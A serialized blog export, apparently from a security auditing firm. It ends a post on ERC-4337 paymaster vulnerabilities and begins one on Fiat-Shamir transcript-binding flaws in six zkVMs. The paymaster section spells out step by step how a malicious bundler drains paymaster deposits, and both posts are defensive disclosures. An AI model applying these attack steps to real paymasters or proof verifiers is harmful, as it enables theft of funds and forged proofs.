",{"type":27,"tag":207,"props":114568,"children":114569},{"style":226},[114570],{"type":33,"value":10380},{"type":27,"tag":207,"props":114572,"children":114573},{"style":238},[114574],{"type":33,"value":114575}," (ctx.preFund ",{"type":27,"tag":207,"props":114577,"children":114578},{"style":226},[114579],{"type":33,"value":9286},{"type":27,"tag":207,"props":114581,"children":114582},{"style":238},[114583],{"type":33,"value":114584}," ctx.exchangeRate) ",{"type":27,"tag":207,"props":114586,"children":114587},{"style":226},[114588],{"type":33,"value":980},{"type":27,"tag":207,"props":114590,"children":114591},{"style":232},[114592],{"type":33,"value":114593}," 1e18",{"type":27,"tag":207,"props":114595,"children":114596},{"style":238},[114597],{"type":33,"value":241},{"type":27,"tag":207,"props":114599,"children":114600},{"class":209,"line":7978},[114601],{"type":27,"tag":207,"props":114602,"children":114603},{"emptyLinePlaceholder":19},[114604],{"type":33,"value":2062},{"type":27,"tag":207,"props":114606,"children":114607},{"class":209,"line":7987},[114608,114612,114617,114621,114625,114629,114633,114637,114641,114645,114649],{"type":27,"tag":207,"props":114609,"children":114610},{"style":376},[114611],{"type":33,"value":10562},{"type":27,"tag":207,"props":114613,"children":114614},{"style":238},[114615],{"type":33,"value":114616}," (ctx.recipient ",{"type":27,"tag":207,"props":114618,"children":114619},{"style":226},[114620],{"type":33,"value":22963},{"type":27,"tag":207,"props":114622,"children":114623},{"style":8920},[114624],{"type":33,"value":13532},{"type":27,"tag":207,"props":114626,"children":114627},{"style":238},[114628],{"type":33,"value":1343},{"type":27,"tag":207,"props":114630,"children":114631},{"style":232},[114632],{"type":33,"value":1660},{"type":27,"tag":207,"props":114634,"children":114635},{"style":238},[114636],{"type":33,"value":2222},{"type":27,"tag":207,"props":114638,"children":114639},{"style":226},[114640],{"type":33,"value":80428},{"type":27,"tag":207,"props":114642,"children":114643},{"style":238},[114644],{"type":33,"value":114566},{"type":27,"tag":207,"props":114646,"children":114647},{"style":226},[114648],{"type":33,"value":17739},{"type":27,"tag":207,"props":114650,"children":114651},{"style":238},[114652],{"type":33,"value":114653}," costInToken) {\n",{"type":27,"tag":207,"props":114655,"children":114656},{"class":209,"line":7996},[114657,114662,114666,114671,114675],{"type":27,"tag":207,"props":114658,"children":114659},{"style":238},[114660],{"type":33,"value":114661}," SafeTransferLib.",{"type":27,"tag":207,"props":114663,"children":114664},{"style":1335},[114665],{"type":33,"value":110845},{"type":27,"tag":207,"props":114667,"children":114668},{"style":238},[114669],{"type":33,"value":114670},"(ctx.token, ctx.sender, ctx.recipient, preFundInToken ",{"type":27,"tag":207,"props":114672,"children":114673},{"style":226},[114674],{"type":33,"value":11611},{"type":27,"tag":207,"props":114676,"children":114677},{"style":238},[114678],{"type":33,"value":114679}," costInToken);\n",{"type":27,"tag":207,"props":114681,"children":114682},{"class":209,"line":8005},[114683],{"type":27,"tag":207,"props":114684,"children":114685},{"style":238},[114686],{"type":33,"value":10637},{"type":27,"tag":207,"props":114688,"children":114689},{"class":209,"line":8013},[114690],{"type":27,"tag":207,"props":114691,"children":114692},{"emptyLinePlaceholder":19},[114693],{"type":33,"value":2062},{"type":27,"tag":207,"props":114695,"children":114696},{"class":209,"line":8021},[114697,114702,114706],{"type":27,"tag":207,"props":114698,"children":114699},{"style":376},[114700],{"type":33,"value":114701}," emit",{"type":27,"tag":207,"props":114703,"children":114704},{"style":1335},[114705],{"type":33,"value":111579},{"type":27,"tag":207,"props":114707,"children":114708},{"style":238},[114709],{"type":33,"value":114710},"(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n",{"type":27,"tag":207,"props":114712,"children":114713},{"class":209,"line":8029},[114714],{"type":27,"tag":207,"props":114715,"children":114716},{"style":238},[114717],{"type":33,"value":10645},{"type":27,"tag":36,"props":114719,"children":114720},{},[114721,114723,114728,114730,114736,114738,114744,114746,114751,114753,114758],{"type":33,"value":114722},"As shown above, the paymaster calculates the actual gas used and attempts to charge the user by calling ",{"type":27,"tag":84,"props":114724,"children":114726},{"className":114725},[],[114727],{"type":33,"value":110845},{"type":33,"value":114729},". Note that ",{"type":27,"tag":84,"props":114731,"children":114733},{"className":114732},[],[114734],{"type":33,"value":114735},"preFundCharged",{"type":33,"value":114737}," can be zero, as users can opt out of any ",{"type":27,"tag":84,"props":114739,"children":114741},{"className":114740},[],[114742],{"type":33,"value":114743},"preFund",{"type":33,"value":114745}," during the validation phase. If the user hasn't given sufficient allowance to Pimlico's paymaster for the transfer, the ",{"type":27,"tag":84,"props":114747,"children":114749},{"className":114748},[],[114750],{"type":33,"value":111644},{"type":33,"value":114752}," call inside ",{"type":27,"tag":84,"props":114754,"children":114756},{"className":114755},[],[114757],{"type":33,"value":112728},{"type":33,"value":114759}," will revert and the paymaster won't be able to collect payment from the user.",{"type":27,"tag":36,"props":114761,"children":114762},{},[114763,114765,114770,114772,114778,114780,114786],{"type":33,"value":114764},"However, even when ",{"type":27,"tag":84,"props":114766,"children":114768},{"className":114767},[],[114769],{"type":33,"value":111644},{"type":33,"value":114771}," fails, the EntryPoint will still complete the execution and pay the bundler who submitted it. Importantly, this payment comes from the paymaster's deposit, since during validation the ",{"type":27,"tag":84,"props":114773,"children":114775},{"className":114774},[],[114776],{"type":33,"value":114777},"requiredPrefund",{"type":33,"value":114779}," was taken from the paymaster's ",{"type":27,"tag":47,"props":114781,"children":114784},{"href":114782,"rel":114783},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L625-L627",[51],[114785],{"type":33,"value":69195},{"type":33,"value":1041},{"type":27,"tag":36,"props":114788,"children":114789},{},[114790,114792,114797],{"type":33,"value":114791},"This creates a critical vulnerability for paymasters that implement post-execution charging patterns. Even if the ",{"type":27,"tag":84,"props":114793,"children":114795},{"className":114794},[],[114796],{"type":33,"value":111644},{"type":33,"value":114798}," call fails (meaning the paymaster couldn't collect payment from the user), the paymaster still has to pay the bundler's gas costs from their deposited funds. This vulnerability can be exploited by malicious bundlers in the following way:",{"type":27,"tag":12719,"props":114800,"children":114801},{},[114802,114820,114839,114850,114855],{"type":27,"tag":1232,"props":114803,"children":114804},{},[114805,114807,114812,114814],{"type":33,"value":114806},"The bundler creates a ",{"type":27,"tag":84,"props":114808,"children":114810},{"className":114809},[],[114811],{"type":33,"value":109389},{"type":33,"value":114813}," with an intentionally high ",{"type":27,"tag":84,"props":114815,"children":114817},{"className":114816},[],[114818],{"type":33,"value":114819},"gasPrice",{"type":27,"tag":1232,"props":114821,"children":114822},{},[114823,114825,114830,114832,114837],{"type":33,"value":114824},"The bundler ensures the ",{"type":27,"tag":84,"props":114826,"children":114828},{"className":114827},[],[114829],{"type":33,"value":111644},{"type":33,"value":114831}," call will fail by revoking the paymaster's token allowance before ",{"type":27,"tag":84,"props":114833,"children":114835},{"className":114834},[],[114836],{"type":33,"value":111644},{"type":33,"value":114838}," executes",{"type":27,"tag":1232,"props":114840,"children":114841},{},[114842,114843,114848],{"type":33,"value":70587},{"type":27,"tag":84,"props":114844,"children":114846},{"className":114845},[],[114847],{"type":33,"value":111644},{"type":33,"value":114849}," fails, the bundler still gets paid their high gas costs by the paymaster",{"type":27,"tag":1232,"props":114851,"children":114852},{},[114853],{"type":33,"value":114854},"The paymaster loses money since they paid the bundler but couldn't collect from the user",{"type":27,"tag":1232,"props":114856,"children":114857},{},[114858],{"type":33,"value":114859},"The bundler profits as long as their actual gas costs are less than what they charged",{"type":27,"tag":36,"props":114861,"children":114862},{},[114863,114865,114870,114872,114877],{"type":33,"value":114864},"This effectively allows bundlers to drain paymaster deposits by submitting ",{"type":27,"tag":84,"props":114866,"children":114868},{"className":114867},[],[114869],{"type":33,"value":109418},{"type":33,"value":114871}," designed to fail during ",{"type":27,"tag":84,"props":114873,"children":114875},{"className":114874},[],[114876],{"type":33,"value":111644},{"type":33,"value":114878}," while maximizing the gas costs they can charge to the paymaster.",{"type":27,"tag":36,"props":114880,"children":114881},{},[114882,114884,114889,114891,114896,114898,114904,114906,114911],{"type":33,"value":114883},"Some paymasters try to protect against this by simulating the ",{"type":27,"tag":84,"props":114885,"children":114887},{"className":114886},[],[114888],{"type":33,"value":109389},{"type":33,"value":114890}," execution before signing and allowing it to be submitted. However, this protection can be easily bypassed because an attacker can simply approve the required token allowance during simulation to pass validation, but then revoke the allowance just before the ",{"type":27,"tag":84,"props":114892,"children":114894},{"className":114893},[],[114895],{"type":33,"value":109389},{"type":33,"value":114897}," is submitted via ",{"type":27,"tag":84,"props":114899,"children":114901},{"className":114900},[],[114902],{"type":33,"value":114903},"handleOps",{"type":33,"value":114905},". This means the ",{"type":27,"tag":84,"props":114907,"children":114909},{"className":114908},[],[114910],{"type":33,"value":111644},{"type":33,"value":114912}," will pass simulation but fail during actual execution, allowing the bundler to drain the paymaster's deposit from the EntryPoint.",{"type":27,"tag":36,"props":114914,"children":114915},{},[114916],{"type":33,"value":114917},"To protect against this vulnerability, paymasters should implement pre-execution charging patterns rather than post-execution charging. This means requiring users to pre-fund the full estimated gas cost during the validation phase, before the operation executes. By collecting payment upfront, the paymaster is protected against failed post-execution transfers that could be exploited by malicious bundlers.",{"type":27,"tag":36,"props":114919,"children":114920},{},[114921],{"type":33,"value":114922},"If post-execution charging is absolutely necessary for UX reasons, paymasters have several mitigation strategies available. One approach is to restrict usage to a whitelist of trusted bundlers, though this introduces centralization concerns. Alternatively, Pimlico tries to address this issue by tightening API limits and constraining ERC-20 usage for its users.",{"type":27,"tag":36,"props":114924,"children":114925},{},[114926],{"type":33,"value":114927},"The most secure approach is to require upfront pre-funding, even though it may temporarily lock more user funds. This small UX tradeoff is worth the strong security guarantees it provides against paymaster exploitation.",{"type":27,"tag":42626,"props":114929,"children":114930},{"id":10112},[114931],{"type":33,"value":10115},{"type":27,"tag":36,"props":114933,"children":114934},{},[114935],{"type":33,"value":114936},"ERC-4337 paymasters enable powerful new UX patterns by abstracting away gas costs from end users. However, implementing them securely requires careful consideration of the standard's execution flow and potential attack vectors. The key lessons are:",{"type":27,"tag":12719,"props":114938,"children":114939},{},[114940,114945,114950,114955,114960],{"type":27,"tag":1232,"props":114941,"children":114942},{},[114943],{"type":33,"value":114944},"Always collect full payment during validation, not after execution",{"type":27,"tag":1232,"props":114946,"children":114947},{},[114948],{"type":33,"value":114949},"Be conservative with gas estimations and include safety margins",{"type":27,"tag":1232,"props":114951,"children":114952},{},[114953],{"type":33,"value":114954},"Carefully validate all user inputs and token transfers",{"type":27,"tag":1232,"props":114956,"children":114957},{},[114958],{"type":33,"value":114959},"Test extensively, including simulation of malicious behavior",{"type":27,"tag":1232,"props":114961,"children":114962},{},[114963,114965,114970],{"type":33,"value":114964},"Always review changes in new ",{"type":27,"tag":84,"props":114966,"children":114968},{"className":114967},[],[114969],{"type":33,"value":109470},{"type":33,"value":114971}," versions, as they may impact your paymaster's design and security assumptions",{"type":27,"tag":36,"props":114973,"children":114974},{},[114975,114977,114982,114984,114989,114991,114996],{"type":33,"value":114976},"The last point is particularly important as the ERC-4337 standard continues to evolve. Changes to the ",{"type":27,"tag":84,"props":114978,"children":114980},{"className":114979},[],[114981],{"type":33,"value":109470},{"type":33,"value":114983}," contract's behavior could potentially break existing ",{"type":27,"tag":84,"props":114985,"children":114987},{"className":114986},[],[114988],{"type":33,"value":109542},{"type":33,"value":114990}," implementations or introduce new security considerations. Developers should thoroughly review release notes and diffs when upgrading to new ",{"type":27,"tag":84,"props":114992,"children":114994},{"className":114993},[],[114995],{"type":33,"value":109470},{"type":33,"value":114997}," versions.",{"type":27,"tag":36,"props":114999,"children":115000},{},[115001],{"type":33,"value":115002},"By following these best practices, developers can build robust paymasters that enhance UX while protecting against exploitation. As the ERC-4337 ecosystem matures, secure paymaster implementations will be crucial for driving mainstream adoption of account abstraction.",{"type":27,"tag":36,"props":115004,"children":115005},{},[115006],{"type":33,"value":115007},"If you're building a paymaster and want to ensure it's secure against these and other vulnerabilities, consider getting an audit from us. Our team has extensive experience auditing ERC-4337 implementations and can help identify potential security issues before they impact production.",{"type":27,"tag":10127,"props":115009,"children":115010},{},[115011],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":115013},[115014,115015,115016,115023,115028,115029],{"id":109304,"depth":244,"text":109307},{"id":109320,"depth":244,"text":109323},{"id":109359,"depth":244,"text":109362,"children":115017},[115018,115019,115020,115021,115022],{"id":109382,"depth":270,"text":109389},{"id":109423,"depth":270,"text":109426},{"id":109449,"depth":270,"text":109452},{"id":21999,"depth":270,"text":109470},{"id":109542,"depth":270,"text":109553},{"id":109605,"depth":244,"text":115024,"children":115025},"Understanding the EntryPoint's Flow",[115026,115027],{"id":109661,"depth":270,"text":109664},{"id":109846,"depth":270,"text":109849},{"id":110089,"depth":244,"text":110095},{"id":111687,"depth":244,"text":111693,"children":115030},[115031,115032],{"id":111747,"depth":270,"text":111750},{"id":111807,"depth":270,"text":111810},"content:blog:2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm",{"_path":115037,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":115038,"description":115039,"date":115040,"author":115041,"image":115044,"isFeatured":19,"onBlogPage":19,"tags":115046,"body":115048,"_type":10152,"_id":130852,"_source":10154,"_file":130853,"_stem":130854,"_extension":10157},"/blog/2026-03-03-zkvms-unfaithful-claims","Unfaithful Claims: Breaking 6 zkVMs","A zkVM verifier should be faithful to one thing above all else: its public claims. Yet we found six systems where this guarantee breaks. Learn how a subtle ordering bug lets an attacker bypass the cryptography entirely and prove mathematically impossible statements.","2026-03-03T12:00:00.000Z",[115042,115043],"himanshu","valter",{"src":115045,"width":17,"height":18},"/posts/zkvms-unfaithful-claims/title.png",[115047],"zkVM",{"type":24,"children":115049,"toc":130816},[115050,115055,115097,115110,115113,115119,115124,115252,115255,115261,115267,115272,115304,115452,115457,115580,115591,115602,115625,115636,115641,115674,115682,115687,115690,115696,115701,115707,115712,115717,115725,115743,115884,115889,115895,115988,116722,116790,116801,116809,117283,117289,117728,118068,118221,118226,119114,119270,119276,119368,119373,119958,120408,120484,120490,120495,120564,120574,120590,120600,120661,121080,121112,121122,121297,121302,121312,121912,122100,122118,122121,122127,122132,122140,122172,122533,122538,122623,122626,122632,122640,122645,122648,122654,122659,122667,122675,122683,122691,122724,122732,122740,122831,123082,123409,123417,123447,123617,123943,123948,123953,123970,123973,123978,123983,123995,124007,124598,124610,124622,124629,124637,124649,124657,124672,124677,124957,124976,125071,125090,125106,125109,125115,125120,125125,125132,125140,125147,125155,125168,125186,125646,125748,125753,125758,125774,125777,125783,125788,125800,125811,125816,126206,126213,126221,126246,126266,126522,126533,126552,126936,127282,127512,127671,127831,128399,128404,128430,128433,128439,128444,128451,128459,128472,128544,128555,128563,128573,128581,128592,128866,128955,128984,128987,128992,129126,129138,129145,129150,129303,129329,129336,129344,129349,129415,129420,129810,129897,129913,129916,129922,129927,129933,130033,130092,130097,130103,130108,130116,130121,130127,130132,130137,130143,130148,130151,130157,130163,130168,130173,130178,130183,130188,130191,130197,130360,130365,130368,130373,130384,130701,130706,130730,130735,130753,130758,130761,130767,130772,130777,130787,130792,130802,130812],{"type":27,"tag":36,"props":115051,"children":115052},{},[115053],{"type":33,"value":115054},"A zkVM verifier should be faithful to one thing above all else: its public claims. If the claimed input/output statement is false, verification must fail.",{"type":27,"tag":36,"props":115056,"children":115057},{},[115058,115060,115065,115066,115071,115072,115077,115078,115083,115084,115089,115090,115095],{"type":33,"value":115059},"We found six systems where this faithfulness breaks. Across ",{"type":27,"tag":12606,"props":115061,"children":115062},{},[115063],{"type":33,"value":115064},"Jolt",{"type":33,"value":1123},{"type":27,"tag":12606,"props":115067,"children":115068},{},[115069],{"type":33,"value":115070},"Nexus",{"type":33,"value":1123},{"type":27,"tag":12606,"props":115073,"children":115074},{},[115075],{"type":33,"value":115076},"Cairo-M",{"type":33,"value":1123},{"type":27,"tag":12606,"props":115079,"children":115080},{},[115081],{"type":33,"value":115082},"Ceno",{"type":33,"value":1123},{"type":27,"tag":12606,"props":115085,"children":115086},{},[115087],{"type":33,"value":115088},"Expander",{"type":33,"value":4601},{"type":27,"tag":12606,"props":115091,"children":115092},{},[115093],{"type":33,"value":115094},"Binius64",{"type":33,"value":115096},", public-claim data was not always bound into Fiat-Shamir transcripts before challenge generation. That subtle ordering bug turns statement values into attacker-controlled variables in later verification equations.",{"type":27,"tag":36,"props":115098,"children":115099},{},[115100,115102,115108],{"type":33,"value":115101},"In this post, we demonstrate how to exploit these unbound variables to bypass the cryptography entirely and prove mathematically impossible statements, such as finding a counterexample to Fermat's Last Theorem (see ",{"type":27,"tag":47,"props":115103,"children":115105},{"href":115104},"#challenges",[115106],{"type":33,"value":115107},"Challenges",{"type":33,"value":115109}," to try this out yourself). In a blockchain context, this could translate to receiving $1M out of thin air.",{"type":27,"tag":26063,"props":115111,"children":115112},{},[],{"type":27,"tag":28,"props":115114,"children":115116},{"id":115115},"jargon-cheat-sheet",[115117],{"type":33,"value":115118},"Jargon Cheat Sheet",{"type":27,"tag":36,"props":115120,"children":115121},{},[115122],{"type":33,"value":115123},"Before we go deeper, here's a one-liner for every term you'll encounter. The ZK ecosystem is particularly full of jargon and abbreviations, which may be off-putting to newcomers. Bookmark this section.",{"type":27,"tag":1228,"props":115125,"children":115126},{},[115127,115137,115147,115157,115167,115177,115187,115197,115207,115217,115227,115237],{"type":27,"tag":1232,"props":115128,"children":115129},{},[115130,115135],{"type":27,"tag":12606,"props":115131,"children":115132},{},[115133],{"type":33,"value":115134},"Fiat-Shamir",{"type":33,"value":115136},": Instead of a real verifier sending random challenges, hash everything so far to get \"random\" challenges. Makes proofs non-interactive.",{"type":27,"tag":1232,"props":115138,"children":115139},{},[115140,115145],{"type":27,"tag":12606,"props":115141,"children":115142},{},[115143],{"type":33,"value":115144},"Transcript",{"type":33,"value":115146},": The running hash state. You \"absorb\" data into it, then \"squeeze\" out challenges.",{"type":27,"tag":1232,"props":115148,"children":115149},{},[115150,115155],{"type":27,"tag":12606,"props":115151,"children":115152},{},[115153],{"type":33,"value":115154},"Polynomial Commitment",{"type":33,"value":115156},": Like a hash, but for polynomials. You commit to a polynomial, then later prove \"my polynomial evaluates to 42 at point 7\" without revealing the whole polynomial.",{"type":27,"tag":1232,"props":115158,"children":115159},{},[115160,115165],{"type":27,"tag":12606,"props":115161,"children":115162},{},[115163],{"type":33,"value":115164},"Sumcheck",{"type":33,"value":115166},": A protocol to prove \"this polynomial sums to H over all boolean inputs\" without actually computing the exponentially many terms. Reduces to checking one random point.",{"type":27,"tag":1232,"props":115168,"children":115169},{},[115170,115175],{"type":27,"tag":12606,"props":115171,"children":115172},{},[115173],{"type":33,"value":115174},"MLE (Multilinear Extension)",{"type":33,"value":115176},": Turn a table of values into a polynomial. The polynomial equals the table on 0/1 inputs and smoothly interpolates elsewhere. Key property: evaluating it is a linear function of the table entries.",{"type":27,"tag":1232,"props":115178,"children":115179},{},[115180,115185],{"type":27,"tag":12606,"props":115181,"children":115182},{},[115183],{"type":33,"value":115184},"Lookup / LogUp",{"type":33,"value":115186},": Prove \"all my values appear in this table\" by encoding membership as sums of fractions. If the sums match, the sets match (with high probability).",{"type":27,"tag":1232,"props":115188,"children":115189},{},[115190,115195],{"type":27,"tag":12606,"props":115191,"children":115192},{},[115193],{"type":33,"value":115194},"AIR",{"type":33,"value":115196},": \"Algebraic Intermediate Representation\" - a way to write \"valid execution trace\" as polynomial equations. If the equations hold, the trace is valid.",{"type":27,"tag":1232,"props":115198,"children":115199},{},[115200,115205],{"type":27,"tag":12606,"props":115201,"children":115202},{},[115203],{"type":33,"value":115204},"STARK",{"type":33,"value":115206},": Prove AIR constraints hold using commitments + random sampling + FRI. No trusted setup needed.",{"type":27,"tag":1232,"props":115208,"children":115209},{},[115210,115215],{"type":27,"tag":12606,"props":115211,"children":115212},{},[115213],{"type":33,"value":115214},"FRI",{"type":33,"value":115216},": \"Fast Reed-Solomon IOP\" - proves a committed function is actually a low-degree polynomial, not arbitrary garbage that passes spot-checks.",{"type":27,"tag":1232,"props":115218,"children":115219},{},[115220,115225],{"type":27,"tag":12606,"props":115221,"children":115222},{},[115223],{"type":33,"value":115224},"OODS",{"type":33,"value":115226},": \"Out-of-Domain Sampling\" - check the constraint polynomial at a random point outside the execution domain. Ties everything together.",{"type":27,"tag":1232,"props":115228,"children":115229},{},[115230,115235],{"type":27,"tag":12606,"props":115231,"children":115232},{},[115233],{"type":33,"value":115234},"GKR",{"type":33,"value":115236},": Verify arithmetic circuits layer-by-layer using sumcheck. Reduces \"check this huge circuit\" to \"check a few random evaluations.\"",{"type":27,"tag":1232,"props":115238,"children":115239},{},[115240,115245,115247],{"type":27,"tag":12606,"props":115241,"children":115242},{},[115243],{"type":33,"value":115244},"claimed_sum / opening_claim",{"type":33,"value":115246},": Prover-supplied values that feed into verification equations. ",{"type":27,"tag":12606,"props":115248,"children":115249},{},[115250],{"type":33,"value":115251},"These are the usual suspects for binding bugs.",{"type":27,"tag":26063,"props":115253,"children":115254},{},[],{"type":27,"tag":28,"props":115256,"children":115258},{"id":115257},"what-are-we-even-breaking",[115259],{"type":33,"value":115260},"What Are We Even Breaking?",{"type":27,"tag":58,"props":115262,"children":115264},{"id":115263},"what-is-a-zkvm",[115265],{"type":33,"value":115266},"What is a zkVM?",{"type":27,"tag":36,"props":115268,"children":115269},{},[115270],{"type":33,"value":115271},"A zkVM proof claims that a program executed correctly on public inputs, producing the claimed public output, while hiding the full execution trace.",{"type":27,"tag":36,"props":115273,"children":115274},{},[115275,115277,115302],{"type":33,"value":115276},"Formally, the verifier is convinced that there exists a valid trace ",{"type":27,"tag":84,"props":115278,"children":115280},{"className":115279},[11266,11267],[115281],{"type":27,"tag":207,"props":115282,"children":115284},{"className":115283},[11272],[115285],{"type":27,"tag":207,"props":115286,"children":115288},{"className":115287,"ariaHidden":11278},[11277],[115289],{"type":27,"tag":207,"props":115290,"children":115292},{"className":115291},[11283],[115293,115297],{"type":27,"tag":207,"props":115294,"children":115296},{"className":115295,"style":28855},[11288],[],{"type":27,"tag":207,"props":115298,"children":115300},{"className":115299,"style":28861},[11294,28860],[115301],{"type":33,"value":13269},{"type":33,"value":115303}," such that:",{"type":27,"tag":36,"props":115305,"children":115306},{},[115307],{"type":27,"tag":84,"props":115308,"children":115310},{"className":115309},[11266,11267],[115311],{"type":27,"tag":207,"props":115312,"children":115314},{"className":115313},[11272],[115315],{"type":27,"tag":207,"props":115316,"children":115318},{"className":115317,"ariaHidden":11278},[11277],[115319,115363,115438],{"type":27,"tag":207,"props":115320,"children":115322},{"className":115321},[11283],[115323,115327,115333,115337,115342,115346,115350,115355,115359],{"type":27,"tag":207,"props":115324,"children":115326},{"className":115325,"style":100179},[11288],[],{"type":27,"tag":207,"props":115328,"children":115330},{"className":115329},[11294],[115331],{"type":33,"value":115332},"∃",{"type":27,"tag":207,"props":115334,"children":115336},{"className":115335,"style":11470},[11372],[],{"type":27,"tag":207,"props":115338,"children":115340},{"className":115339,"style":28861},[11294,28860],[115341],{"type":33,"value":13269},{"type":27,"tag":207,"props":115343,"children":115345},{"className":115344,"style":11470},[11372],[],{"type":27,"tag":207,"props":115347,"children":115349},{"className":115348,"style":11470},[11372],[],{"type":27,"tag":207,"props":115351,"children":115353},{"className":115352},[11475],[115354],{"type":33,"value":736},{"type":27,"tag":207,"props":115356,"children":115358},{"className":115357,"style":11470},[11372],[],{"type":27,"tag":207,"props":115360,"children":115362},{"className":115361,"style":11470},[11372],[],{"type":27,"tag":207,"props":115364,"children":115366},{"className":115365},[11283],[115367,115371,115382,115387,115392,115397,115401,115406,115411,115415,115420,115425,115429,115434],{"type":27,"tag":207,"props":115368,"children":115370},{"className":115369,"style":11393},[11288],[],{"type":27,"tag":207,"props":115372,"children":115374},{"className":115373},[11294],[115375],{"type":27,"tag":207,"props":115376,"children":115379},{"className":115377},[11294,115378],"mathsf",[115380],{"type":33,"value":115381},"VM",{"type":27,"tag":207,"props":115383,"children":115385},{"className":115384},[28989],[115386],{"type":33,"value":1343},{"type":27,"tag":207,"props":115388,"children":115390},{"className":115389,"style":28861},[11294,28860],[115391],{"type":33,"value":28864},{"type":27,"tag":207,"props":115393,"children":115395},{"className":115394},[11404],[115396],{"type":33,"value":11407},{"type":27,"tag":207,"props":115398,"children":115400},{"className":115399,"style":11411},[11372],[],{"type":27,"tag":207,"props":115402,"children":115404},{"className":115403,"style":102284},[11294,28860],[115405],{"type":33,"value":13415},{"type":27,"tag":207,"props":115407,"children":115409},{"className":115408},[11404],[115410],{"type":33,"value":11407},{"type":27,"tag":207,"props":115412,"children":115414},{"className":115413,"style":11411},[11372],[],{"type":27,"tag":207,"props":115416,"children":115418},{"className":115417,"style":28861},[11294,28860],[115419],{"type":33,"value":13269},{"type":27,"tag":207,"props":115421,"children":115423},{"className":115422},[29011],[115424],{"type":33,"value":10416},{"type":27,"tag":207,"props":115426,"children":115428},{"className":115427,"style":11470},[11372],[],{"type":27,"tag":207,"props":115430,"children":115432},{"className":115431},[11475],[115433],{"type":33,"value":29606},{"type":27,"tag":207,"props":115435,"children":115437},{"className":115436,"style":11470},[11372],[],{"type":27,"tag":207,"props":115439,"children":115441},{"className":115440},[11283],[115442,115446],{"type":27,"tag":207,"props":115443,"children":115445},{"className":115444,"style":28855},[11288],[],{"type":27,"tag":207,"props":115447,"children":115450},{"className":115448,"style":115449},[11294,28860],"margin-right:0.22222em;",[115451],{"type":33,"value":13445},{"type":27,"tag":36,"props":115453,"children":115454},{},[115455],{"type":33,"value":115456},"where:",{"type":27,"tag":1228,"props":115458,"children":115459},{},[115460,115490,115520,115550],{"type":27,"tag":1232,"props":115461,"children":115462},{},[115463,115488],{"type":27,"tag":84,"props":115464,"children":115466},{"className":115465},[11266,11267],[115467],{"type":27,"tag":207,"props":115468,"children":115470},{"className":115469},[11272],[115471],{"type":27,"tag":207,"props":115472,"children":115474},{"className":115473,"ariaHidden":11278},[11277],[115475],{"type":27,"tag":207,"props":115476,"children":115478},{"className":115477},[11283],[115479,115483],{"type":27,"tag":207,"props":115480,"children":115482},{"className":115481,"style":28855},[11288],[],{"type":27,"tag":207,"props":115484,"children":115486},{"className":115485,"style":28861},[11294,28860],[115487],{"type":33,"value":28864},{"type":33,"value":115489}," = program/circuit description (public)",{"type":27,"tag":1232,"props":115491,"children":115492},{},[115493,115518],{"type":27,"tag":84,"props":115494,"children":115496},{"className":115495},[11266,11267],[115497],{"type":27,"tag":207,"props":115498,"children":115500},{"className":115499},[11272],[115501],{"type":27,"tag":207,"props":115502,"children":115504},{"className":115503,"ariaHidden":11278},[11277],[115505],{"type":27,"tag":207,"props":115506,"children":115508},{"className":115507},[11283],[115509,115513],{"type":27,"tag":207,"props":115510,"children":115512},{"className":115511,"style":28855},[11288],[],{"type":27,"tag":207,"props":115514,"children":115516},{"className":115515,"style":102284},[11294,28860],[115517],{"type":33,"value":13415},{"type":33,"value":115519}," = public input",{"type":27,"tag":1232,"props":115521,"children":115522},{},[115523,115548],{"type":27,"tag":84,"props":115524,"children":115526},{"className":115525},[11266,11267],[115527],{"type":27,"tag":207,"props":115528,"children":115530},{"className":115529},[11272],[115531],{"type":27,"tag":207,"props":115532,"children":115534},{"className":115533,"ariaHidden":11278},[11277],[115535],{"type":27,"tag":207,"props":115536,"children":115538},{"className":115537},[11283],[115539,115543],{"type":27,"tag":207,"props":115540,"children":115542},{"className":115541,"style":28855},[11288],[],{"type":27,"tag":207,"props":115544,"children":115546},{"className":115545,"style":115449},[11294,28860],[115547],{"type":33,"value":13445},{"type":33,"value":115549}," = claimed public output",{"type":27,"tag":1232,"props":115551,"children":115552},{},[115553,115578],{"type":27,"tag":84,"props":115554,"children":115556},{"className":115555},[11266,11267],[115557],{"type":27,"tag":207,"props":115558,"children":115560},{"className":115559},[11272],[115561],{"type":27,"tag":207,"props":115562,"children":115564},{"className":115563,"ariaHidden":11278},[11277],[115565],{"type":27,"tag":207,"props":115566,"children":115568},{"className":115567},[11283],[115569,115573],{"type":27,"tag":207,"props":115570,"children":115572},{"className":115571,"style":28855},[11288],[],{"type":27,"tag":207,"props":115574,"children":115576},{"className":115575,"style":28861},[11294,28860],[115577],{"type":33,"value":13269},{"type":33,"value":115579}," = private witness/trace (registers, memory history, intermediate values)",{"type":27,"tag":36,"props":115581,"children":115582},{},[115583,115585,115589],{"type":33,"value":115584},"The verifier does ",{"type":27,"tag":12606,"props":115586,"children":115587},{},[115588],{"type":33,"value":25759},{"type":33,"value":115590}," replay execution step by step. Instead, it checks algebraic constraints over committed polynomials.",{"type":27,"tag":36,"props":115592,"children":115593},{},[115594,115596,115601],{"type":33,"value":115595},"Some systems in this post are verifiable-computing systems rather than full zero-knowledge systems, but the critical property is still ",{"type":27,"tag":12606,"props":115597,"children":115598},{},[115599],{"type":33,"value":115600},"soundness",{"type":33,"value":736},{"type":27,"tag":1228,"props":115603,"children":115604},{},[115605,115615],{"type":27,"tag":1232,"props":115606,"children":115607},{},[115608,115613],{"type":27,"tag":12606,"props":115609,"children":115610},{},[115611],{"type":33,"value":115612},"Completeness",{"type":33,"value":115614},": honest execution verifies.",{"type":27,"tag":1232,"props":115616,"children":115617},{},[115618,115623],{"type":27,"tag":12606,"props":115619,"children":115620},{},[115621],{"type":33,"value":115622},"Soundness",{"type":33,"value":115624},": false execution should not verify.",{"type":27,"tag":36,"props":115626,"children":115627},{},[115628,115630,115634],{"type":33,"value":115629},"We are breaking ",{"type":27,"tag":12606,"props":115631,"children":115632},{},[115633],{"type":33,"value":115600},{"type":33,"value":115635}," in all six systems.",{"type":27,"tag":36,"props":115637,"children":115638},{},[115639],{"type":33,"value":115640},"In all six codebases, verification follows this abstract 